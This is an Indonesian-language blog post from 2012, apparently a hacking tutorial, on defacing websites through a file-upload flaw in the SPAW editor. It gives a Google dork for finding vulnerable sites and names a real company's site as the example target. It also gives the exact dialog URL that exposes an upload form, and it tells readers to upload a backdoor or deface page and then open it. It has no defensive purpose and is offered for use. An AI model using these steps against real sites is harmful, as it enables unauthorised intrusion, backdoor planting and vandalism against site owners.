Sunday 13 May 2012

Deface Website With Spaw Upload

Unknown    No comments

Ane lagi jalan2 malem,eh nemu cara deface web dengan menggunakan kelemahan Spaw uploader..
sebelumnya maap ya omz om kalau repost n maap kalo tricknya udah jadul,maklum masih nubie belajar

langsung aja ,pertama kita cari dulu di paman ane dengan dork :


Code:
inurl:spaw2/uploads/files/

contoh ane pake target yang udah di dapet

Code:
http://punjlloyd.com/admin/spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files/

kode yang
Code:
spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files

ganti menjadi seperti di bawah ini

Code:
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

jadinya kaya gini nih omz

Code:
http://punjlloyd.com/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

nanti bakalan keluar tuh tempat buat upload filenya..
tinggal di upload aja file/backdoor yang mau kita upload,nanti bakal keluar kaya gini

v
terakhir tinggal di panggil deh kaya gini

Code:
http://punjlloyd.com/admin/spaw2/uploads/files/ADa.html

sekali lagi maap ya kalo trik nya ketinggalan jaman.. piss

kalau boleh ane minta yang ijo2 nya ya omz om sekalian.. smangat

Socializer Widget By Blogger Yard
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

 

Copyright © 2013 Viscount.